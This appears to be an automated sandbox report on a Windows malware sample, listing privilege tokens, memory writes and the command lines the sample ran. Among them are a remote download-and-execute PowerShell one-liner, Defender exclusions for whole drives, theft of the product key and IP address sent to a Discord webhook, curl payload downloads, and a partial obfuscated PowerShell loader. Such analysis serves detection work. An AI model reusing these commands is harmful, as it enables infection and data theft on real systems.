N/A N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
N/A N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
N/A N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\x4V5.2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\ApplicationFrameHost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4572 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 1940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 1940 wrote to memory of 1444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 1940 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 1940 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\cmd.exe
PID 2900 wrote to memory of 1576 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1576 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 3328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 3328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 3328 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mountvol.exe
PID 3328 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mountvol.exe
PID 3328 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3328 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2900 wrote to memory of 3664 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 3664 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 424 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 424 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2900 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4128 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4128 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4128 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4128 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2900 wrote to memory of 5112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 5112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 5112 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2900 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2112 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2112 wrote to memory of 804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 1020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2900 wrote to memory of 1020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1020 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1020 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 4216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 2196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 2196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 3000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 3000 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 2900 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
PID 2900 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
PID 2900 wrote to memory of 2076 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe
PID 2900 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 2900 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 2076 wrote to memory of 4752 N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe
PID 2076 wrote to memory of 4752 N/A C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe
PID 2900 wrote to memory of 4480 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe
PID 2900 wrote to memory of 4480 N/A C:\Windows\System32\cmd.exe C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe
PID 2900 wrote to memory of 4668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 2900 wrote to memory of 4668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 4480 wrote to memory of 4420 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4480 wrote to memory of 4420 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4480 wrote to memory of 1540 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\ProgramData\x4V5.2.exe
PID 4480 wrote to memory of 1540 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\ProgramData\x4V5.2.exe
PID 4480 wrote to memory of 408 N/A C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Virus.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "irm rentry.co/_setup/raw | iex

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Public\uninstaller.bat"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\winlog32.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -WindowStyle Hidden -Command ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol | find ":\"

C:\Windows\system32\mountvol.exe

mountvol

C:\Windows\system32\find.exe

find ":\"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c add-mppreference -exclusionpath C:\

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c add-mppreference -exclusionpath F:\

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c add-mppreference -exclusionpath D:\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic csproduct get uuid /value | find /i "uuid="

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid /value

C:\Windows\system32\find.exe

find /i "uuid="

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault" | findstr /ri "REG_SZ"

C:\Windows\system32\reg.exe

reg query "hkey_local_machine\software\microsoft\windows nt\currentversion\softwareprotectionplatform" /V "BackupProductKeyDefault"

C:\Windows\system32\findstr.exe

findstr /ri "REG_SZ"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl --silent icanhazip.com

C:\Windows\system32\curl.exe

curl --silent icanhazip.com

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -ks "https://rentry.co/cbkt9fio/raw"

C:\Windows\system32\curl.exe

curl -ks "https://rentry.co/cbkt9fio/raw"

C:\Windows\system32\curl.exe

curl -H "Content-Type: application/json" -d "{\"username\": \"TrollSec\", \"embeds\": [{\"title\": \"Enemey Down\", \"color\": 1, \"fields\": [{\"name\": \"Enemey Informations :\", \"value\": \" ```Admin/UJHKQCDS``` **Unique Identifier** `````` **Product Key** ```YC7N8-G7WR6-9WR4H-6Y2W4-KBT6X``` **IP Address** ```191.101.209.39``` \"}],\"thumbnail\":{\"url\": \"\"}, \"footer\":{\"text\": \"17:07:55.18/Fri 06/21/2024\"}}]}" https://discord.com/api/webhooks/1247862642509484092/vR90Kb-l3UPi2-9HRZ2fJ7o7Q0EBnbyiLGfvtKGN75kUdsj5C5BQ0HaTzj15zyWZuFsZ

C:\Windows\system32\curl.exe

Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/uninstaller" --output "C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"

C:\Windows\system32\curl.exe

Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/winhlp32.ex" --output "C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\curl.exe

Curl -L --Silent "https://github.com/xst4/patch1/releases/download/payloads/x4joex.exe" --output "C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe"

C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe

"C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe"

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe

"C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe"

C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe

"C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe"

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4V5.2.exe'

C:\ProgramData\x4V5.2.exe

"C:\ProgramData\x4V5.2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Shellcode.exe'

C:\ProgramData\x4Shellcode.exe

"C:\ProgramData\x4Shellcode.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xjeLFlXJvxoT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BgqrkrvyFKyuUC,[Parameter(Position=1)][Type]$mHOHrtAtbI)$tyEVppdzzpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+[Char](101)+'d'+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$tyEVppdzzpa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BgqrkrvyFKyuUC).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',M'+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$tyEVppdzzpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+'H'+[Char](105)+''+'d'+'eB'+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+'N'+''+